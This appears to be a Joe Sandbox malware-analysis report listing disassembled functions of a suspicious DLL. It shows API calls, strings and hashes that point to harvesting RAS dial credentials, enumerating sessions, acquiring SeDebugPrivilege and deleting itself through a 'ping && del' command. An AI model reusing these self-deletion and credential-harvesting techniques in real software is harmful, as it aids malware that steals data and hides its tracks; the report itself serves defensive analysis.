                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcValue$#823Deleteatoi$Sleep
                                                          • String ID: $ $ $ $ $ $-$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$E$E$E$E$E$E$M$M$M$M$M$M$N$P$P$P$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$W$W$Y$Y$Y$Y$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$a$a$a$a$a$a$a$b$c$c$c$c$d$d$d$d$f$i$i$i$i$i$i$i$i$i$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$s$s$s$s$u$u$u$u$u$v$v$v$v$v$v$w$y
                                                          • API String ID: 3245547908-431623420
                                                          • Opcode ID: 6ddffa8ede800b22b0c7d31f1a98932fe5aee7fc99250002329de52fbb2c0142
                                                          • Instruction ID: 46da3d8f85b41806bff36dc6f8e690e7e2fa6d6d5cef91b77a25e2a54a4f965e
                                                          • Opcode Fuzzy Hash: 6ddffa8ede800b22b0c7d31f1a98932fe5aee7fc99250002329de52fbb2c0142
                                                          • Instruction Fuzzy Hash: 70524C2154D7C0DDE332C6689859BDBBED21BB3709F48489D92DC1B283C2BA4658C77B
                                                          Function 1001B720 Relevance: 299.7, APIs: 11, Strings: 160, Instructions: 425librarysleeploaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • LoadLibraryA.KERNEL32 ref: 1001BA99
                                                          • GetProcAddress.KERNEL32 ref: 1001BB65
                                                          • GetProcAddress.KERNEL32 ref: 1001BDDC
                                                          • GetCurrentProcess.KERNEL32 ref: 1001BE73
                                                          • Sleep.KERNEL32(00000014), ref: 1001BEC5
                                                          • Sleep.KERNEL32(000003E8), ref: 1001BF4C
                                                          • CloseHandle.KERNEL32(?), ref: 1001BF9F
                                                          • CloseHandle.KERNEL32(?), ref: 1001BFBC
                                                          • CloseHandle.KERNEL32(?), ref: 1001BFC7
                                                          • CloseHandle.KERNEL32(?), ref: 1001BFD5
                                                          • FreeLibrary.KERNEL32(00000000), ref: 1001BFDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Handle$Close$AddressLibraryProc$LoadSleep$CurrentFreeModuleProcess
                                                          • String ID: .$.$.$2$2$2$3$3$3$A$A$A$A$A$A$B$B$C$C$D$D$D$D$E$E$E$E$E$E$G$I$I$I$K$L$N$N$O$P$P$P$P$Q$R$R$S$S$S$S$S$T$T$T$T$T$T$U$U$U$V$V$W$W$W$a$a$c$c$c$c$c$c$d$d$d$d$i$i$i$i$i$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$u$u$v$v$v$y$y
                                                          • API String ID: 2138834447-1109127159
                                                          • Opcode ID: b9e704f251a0a837cde59a2c11b08c75fae4c7d90ebe148694494241e37c1652
                                                          • Instruction ID: 269a079fabb6e471e22dbf985f9d891cedc7cb7e94f45f69aca70680d2f295ee
                                                          • Opcode Fuzzy Hash: b9e704f251a0a837cde59a2c11b08c75fae4c7d90ebe148694494241e37c1652
                                                          • Instruction Fuzzy Hash: D432AF6040C7C4C9E332C7688848BDBBFD66BA6748F08499DE2CC4B282C7BA5558C777
                                                          Function 10005D20 Relevance: 206.9, APIs: 24, Strings: 94, Instructions: 416libraryloaderstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 10005D3C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005D45
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,GetPrivateProfileSectionNamesA), ref: 10005D55
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005D58
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetPrivateProfileStringA), ref: 10005D6B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005D6E
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetWindowsDirectoryA), ref: 10005D81
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005D84
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 10005D94
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005D97
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 10005DA7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005DAA
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 10005DBD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005DC0
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcmpA), ref: 10005DD3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005DD6
                                                          • strchr.MSVCRT ref: 100060F0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10006131
                                                          • wsprintfA.USER32 ref: 10006151
                                                          • #823.MFC42(00001000), ref: 100061B3
                                                          • #825.MFC42(?,?,?,00000000,?,?,00000000,?,?), ref: 1000638B
                                                          • #825.MFC42(00000000,?,?,?,00000000,?,?,00000000,?,?), ref: 10006391
                                                          • #825.MFC42(00000000,00000000,?,?,?,00000000,?,?,00000000,?,?), ref: 10006397
                                                          • #825.MFC42(00000000), ref: 100063DD
                                                            • Part of subcall function 10005A50: LoadLibraryA.KERNEL32 ref: 10005AA7
                                                            • Part of subcall function 10005A50: GetProcAddress.KERNEL32(00000000), ref: 10005AAE
                                                            • Part of subcall function 10005A50: wsprintfA.USER32 ref: 10005B17
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$#825$wsprintf$#823FolderPathSpecialstrchr
                                                          • String ID: $ $ $%s\%s$.$.$C$C$D$D$Device$DialParamsUID$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetVersionExA$GetWindowsDirectoryA$KERNEL32.dll$M$M$N$N$PhoneNumber$S$a$a$a$a$a$a$b$b$b$b$c$c$c$c$c$c$d$e$e$e$e$e$e$e$e$f$f$g$h$h$i$i$i$i$i$i$k$k$k$k$k$k$kernel32.dll$lstrcatA$lstrcmpA$lstrcpyA$lstrlenA$m$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$s$s$s$s$s$u$w$w
                                                          • API String ID: 2391671045-4160613188
                                                          • Opcode ID: eca479f0cba930ca087138913895d5de84e08072406ba3e1e92d2a47810035d3
                                                          • Instruction ID: ae3809650b471314dde33fff758c838472e2731737b5b0f95b3dee6920cb3e1a
                                                          • Opcode Fuzzy Hash: eca479f0cba930ca087138913895d5de84e08072406ba3e1e92d2a47810035d3
                                                          • Instruction Fuzzy Hash: 77120A6150D3C4DEE322CB788848B9BBFD5AFE6748F08494DE1C847292C6BA9548C777
                                                          Function 10005440 Relevance: 180.5, APIs: 15, Strings: 88, Instructions: 262libraryloaderstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 10005461
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000546A
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,GetPrivateProfileSectionNamesA), ref: 10005478
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000547B
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetWindowsDirectoryA), ref: 1000548E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005491
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 100054A1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100054A4
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 100054B7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100054BA
                                                          • strchr.MSVCRT ref: 100057B9
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 100057F6
                                                          • wsprintfA.USER32 ref: 10005816
                                                          • #823.MFC42(00001000), ref: 1000583D
                                                          • #825.MFC42(00000000), ref: 1000589B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$#823#825FolderPathSpecialstrchrwsprintf
                                                          • String ID: $ $ $%s\%s$.$.$C$C$D$D$GetPrivateProfileSectionNamesA$GetWindowsDirectoryA$KERNEL32.dll$M$M$N$N$S$a$a$a$a$a$a$b$b$b$b$c$c$c$c$c$c$d$e$e$e$e$e$e$e$e$f$f$g$h$h$i$i$i$i$i$i$k$k$k$k$k$k$kernel32.dll$lstrcatA$lstrcpyA$lstrlenA$m$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$s$s$s$s$s$u$w$w
                                                          • API String ID: 1413152188-1163569440
                                                          • Opcode ID: 6b0de1d9b4d272058180ea5e85739ea82220ea56e8af9adbbb86897ae75e66d6
                                                          • Instruction ID: 0562570b42432492150a784315d896445768f268a1e3393a75b37121b429ab9d
                                                          • Opcode Fuzzy Hash: 6b0de1d9b4d272058180ea5e85739ea82220ea56e8af9adbbb86897ae75e66d6
                                                          • Instruction Fuzzy Hash: E4D1B26140D7C0DDE322C778849878BBFD66FA2748F08498DE1C84B293C6BA9658C777
                                                          Function 1001ACA0 Relevance: 164.8, APIs: 7, Strings: 87, Instructions: 319COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID: .$.$.$.$:$A$AOr$C$E$F$H$I$I$I$I$I$I$I$O$O$R$T$U$W$a$a$a$a$at.$b$c$d$d$d$g$i$i$i$l$l$l$l$l$l$l$l$m$n$n$n$n$n$n$n$n$n$n$n$n$o$o$p$p$p$p$p$p$p$r$r$r$r$r$t$t$t$t$t$t$t$t$t$t$t$t$t$t
                                                          • API String ID: 310444273-3809768815
                                                          • Opcode ID: 63e450fb999bb24abaee570fbd4232a6528e175d703855afcbb30a5378cb40b5
                                                          • Instruction ID: 4c56c63e57b0a57d431be2d6ff2093808df29b32732bb1a27d8720569643267d
                                                          • Opcode Fuzzy Hash: 63e450fb999bb24abaee570fbd4232a6528e175d703855afcbb30a5378cb40b5
                                                          • Instruction Fuzzy Hash: E9E1E42150D3C0DDE332C238844879FBFD65BA2648F48499DE5C84B293C7BA9558D77B
                                                          Function 1001EA60 Relevance: 126.3, APIs: 6, Strings: 66, Instructions: 323threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001ED7E
                                                          • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 1001EDBD
                                                          • GetCurrentProcess.KERNEL32 ref: 1001EEEB
                                                          • GetCurrentThread.KERNEL32 ref: 1001EEF2
                                                          • GetCurrentProcess.KERNEL32(00000020), ref: 1001EF67
                                                          • GetCurrentThread.KERNEL32 ref: 1001EF6E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Current$ModuleProcessThread$AddressEnvironmentFileHandleLibraryLoadNameProcVariable
                                                          • String ID: /c ping -n 2 127.0.0.1 > nul && del $ > nul$.$2$3$A$A$A$A$COMSPEC$D$F$K$L$N$P$P$R$R$S$T$T$a$a$a$b$c$d$d$d$h$h$i$i$i$i$l$l$l$m$m$o$o$r$r$r$r$r$r$r$s$s$s$s$s$s$t$t$t$t$t$t$t$u$u$y
                                                          • API String ID: 2038349478-1119942076
                                                          • Opcode ID: 9915d721cbc08ed20232ab1e04122bf0686c4f9762ecac8d42deb7a8b580a221
                                                          • Instruction ID: 9d52926fe4a0eaf1950449977c8f4f705b15f5448a49f3a95a1c5d791cb7a6bf
                                                          • Opcode Fuzzy Hash: 9915d721cbc08ed20232ab1e04122bf0686c4f9762ecac8d42deb7a8b580a221
                                                          • Instruction Fuzzy Hash: 6FE12A2150C7C089E326C6788449B9FFFD56BE2748F084A5DE2D84B2D2CAFA9548C777
                                                          Function 10024BE0 Relevance: 114.1, APIs: 19, Strings: 46, Instructions: 328stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • LocalAlloc.KERNEL32(00000040,00000400), ref: 10024C06
                                                          • WTSEnumerateSessionsA.WTSAPI32 ref: 10024C3B
                                                          • GetVersionExA.KERNEL32(?), ref: 10024C53
                                                            • Part of subcall function 10024A90: WTSQuerySessionInformationW.WTSAPI32 ref: 10024AB4
                                                            • Part of subcall function 10024A50: WTSQuerySessionInformationA.WTSAPI32(00000000,?,0000000A,?,?,10024ED1,?,?,?), ref: 10024A6F
                                                            • Part of subcall function 10024B40: WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B60
                                                            • Part of subcall function 10024B40: WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B80
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F03
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F25
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F31
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F3A
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F46
                                                          • LocalSize.KERNEL32(00000000), ref: 10024F54
                                                          • LocalReAlloc.KERNEL32(00000000,00000000,00000042,?,?,?,?), ref: 10024F62
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F73
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F91
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FA7
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FCF
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FE5
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10025006
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 1002501C
                                                          • lstrlenA.KERNEL32(?,?,?,?,?), ref: 1002503D
                                                          • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 100250A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Local$AllocInformationQuerySession$Process$CurrentEnumerateFreeMemoryOpenSessionsSizeTokenVersion
                                                          • String ID: AtR$C$C$D$D$I$I$LoSvAtR$Q$RDI$SeDebugPrivilege$SvAtR$c$c$c$c$d$d$d$i$i$i$l$n$n$n$n$n$n$n$n$o$o$o$o$r$s$t$t$t$t$u$v$w$w$y
                                                          • API String ID: 3275454331-1820797497
                                                          • Opcode ID: f5624e6b6a617209da6a5c80ef3033c770dc07205c0af6250f8b0743bed6d2d5
                                                          • Instruction ID: b1de97bb1e532192dcc96ff274dd48cc58c084c44de882cac167928afb279602
                                                          • Opcode Fuzzy Hash: f5624e6b6a617209da6a5c80ef3033c770dc07205c0af6250f8b0743bed6d2d5
                                                          • Instruction Fuzzy Hash: 83E1053050C3C1CEE325CB28C484B9FBBE1AB96708F48495DE5C857352DBBA9909CB67
                                                          Function 10026A30 Relevance: 96.4, APIs: 1, Strings: 54, Instructions: 109processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Exec
                                                          • String ID: &$&$&$&$/$/$1$2$3$4$5$6$:$a$a$a$a$a$c$c$d$d$d$g$g$g$g$i$i$i$l$l$m$n$n$n$n$o$o$o$p$r$r$r$r$r$u$u$u$u$u$u$v$y
                                                          • API String ID: 459137531-3041118241
                                                          • Opcode ID: b22cca66343ad3003d2291dea90512d45e7e4697c411a4a85f85a143834da450
                                                          • Instruction ID: 7bc06bb267aba25a745494efeaf4f4d644bd4b710169c1d4aeb2a62eee067a6f
                                                          • Opcode Fuzzy Hash: b22cca66343ad3003d2291dea90512d45e7e4697c411a4a85f85a143834da450
                                                          • Instruction Fuzzy Hash: 08510C2554E3C1DDE312C668918878FEFD21FB7648E48598DB1C81B393C2AA825CC777
                                                          Function 1000FBF0 Relevance: 93.0, APIs: 13, Strings: 40, Instructions: 217libraryloaderfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 1000FC8C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000FC95
                                                          • LoadLibraryA.KERNEL32(?,.23L), ref: 1000FCDE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000FCE1
                                                          • GetTickCount.KERNEL32 ref: 1000FD3E
                                                          • sprintf.MSVCRT ref: 1000FD4F
                                                          • GetTickCount.KERNEL32 ref: 1000FD8C
                                                          • sprintf.MSVCRT ref: 1000FD9D
                                                          • lstrcatA.KERNEL32(?,?), ref: 1000FDB3
                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000FE19
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000FE20
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCountLibraryLoadProcTicksprintf$CloseFileHandleWritelstrcat
                                                          • String ID: .$.23L$2$3$A$A$C$F$G$K$L$N$P$P$R$T$a$a$d$e$e$e$e$e$e$g$h$i$igu$m$n$o$p$p$r$s$t$t$t$u
                                                          • API String ID: 3729143920-1829843242
                                                          • Opcode ID: e4f6fa49615fa3bf4a5896043488c5a6305fc76200abcc925ed36e56fb71271d
